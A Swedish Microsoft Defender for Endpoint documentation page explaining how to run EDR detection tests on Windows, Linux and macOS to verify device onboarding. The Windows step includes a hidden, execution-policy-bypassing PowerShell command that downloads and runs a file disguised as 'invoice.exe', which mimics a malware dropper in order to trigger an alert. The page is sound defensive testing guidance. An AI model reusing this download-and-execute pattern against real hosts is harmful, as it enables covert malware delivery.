EDR-identifieringstest för att verifiera enhetens registrerings- och rapporteringstjänster

  • Artikel

Gäller för:

Scenariokrav och installation

  • Windows 11, Windows 10 version 1709 version 16273 eller senare, Windows 8.1 eller Windows 7 SP1.
  • Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2 och Windows Server 2008 R2 SP1.
  • Linux
  • macOS
  • Microsoft Defender för Endpoint
  • Microsoft Defender för Endpoint för Linux
  • Microsoft Defender för Endpoint för macOS

Slutpunktsidentifiering och svar för slutpunkten ger avancerade attackidentifieringar som är nästan realtidsbaserade och åtgärdsbara. Säkerhetsanalytiker kan effektivt prioritera varningar, få synlighet över helheten av ett intrång och vidta åtgärder för att åtgärda hot.

Kör ett EDR-identifieringstest för att verifiera att enheten är korrekt registrerad och rapporterar till tjänsten. Utför följande steg på den nyligen registrerade enheten:

Windows

  1. Öppna ett kommandotolksfönster

  2. Kopiera och kör kommandot nedan i kommandotolken. Kommandotolken stängs automatiskt.

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
  1. Om det lyckas markeras identifieringstestet som slutfört och en ny avisering visas om några minuter.

Linux

  1. Ladda ned skriptfilen till en registrerad Linux-server
curl -o ~/Downloads/MDE Linux DIY.zip https://aka.ms/LinuxDIY
  1. Extrahera zip-filen
unzip ~/Downloads/MDE Linux DIY.zip
  1. Kör följande kommando:
./mde_linux_edr_diy.sh

Efter några minuter bör en identifiering aktiveras i Microsoft Defender XDR.

  1. Titta på aviseringsinformationen, datorns tidslinje och utför vanliga undersökningssteg.

macOS

  1. I webbläsaren Microsoft Edge för Mac eller Safari laddar du ned MDATP MacOS-DIY.zip från https://aka.ms/mdatpmacosdiy och extraherar.

    Följande fråga visas:

    Vill du tillåta nedladdningar på "mdatpclientanalyzer.blob.core.windows.net"?
    Du kan ändra vilka webbplatser som kan ladda ned filer i Inställningar för webbplatser.

  2. Klicka på Tillåt.

  3. Öppna Nedladdningar.

  4. Du måste kunna se MDATP MacOS DIY.

    Tips

    Om du dubbelklickar på MDATP MacOS DIY får du följande meddelande:

    Det går inte att öppna "MDATP MacOS DIY" eftersom utvecklaren inte kan verifiera.
    macOS kan inte verifiera att den här appen är fri från skadlig kod.
    [Flytta till papperskorgen][Avbryt]

  5. Klicka på Avbryt.

  6. Högerklicka på MDATP MacOS DIY och klicka sedan på Öppna.

    Systemet visar följande meddelande:

    macOS kan inte verifiera utvecklaren av MDATP MacOS DIY. Vill du öppna den?
    Genom att öppna den här appen åsidosätter du systemsäkerhet som kan exponera din dator och personlig information för skadlig kod som kan skada din Mac eller äventyra din integritet.

  7. Klicka på Öppna.

    Systemet visar följande meddelande:

    Microsoft Defender för Endpoint – macOS EDR DIY-testfil
    Motsvarande avisering är tillgänglig i MDATP-portalen.

  8. Klicka på Öppna.

    Om några minuter utlöses en avisering om macOS EDR-testavisering .

  9. Gå till Microsoft Defender portalen (https://security.microsoft.com/).

  10. Gå till aviseringskö .

    Skärmbild som visar en macOS EDR-testavisering som visar allvarlighetsgrad, kategori, identifieringskälla och en komprimerad meny med åtgärder

    Testaviseringen macOS EDR visar allvarlighetsgrad, kategori, identifieringskälla och en komprimerad meny med åtgärder.

    Titta på aviseringsinformationen och enhetens tidslinje och utför de vanliga undersökningsstegen.

Nästa steg som du kan överväga att utföra är att lägga till AV-undantag efter behov för programkompatibilitet eller prestanda:

Läs igenom Microsoft Defender för Endpoint säkerhetsåtgärdsguide.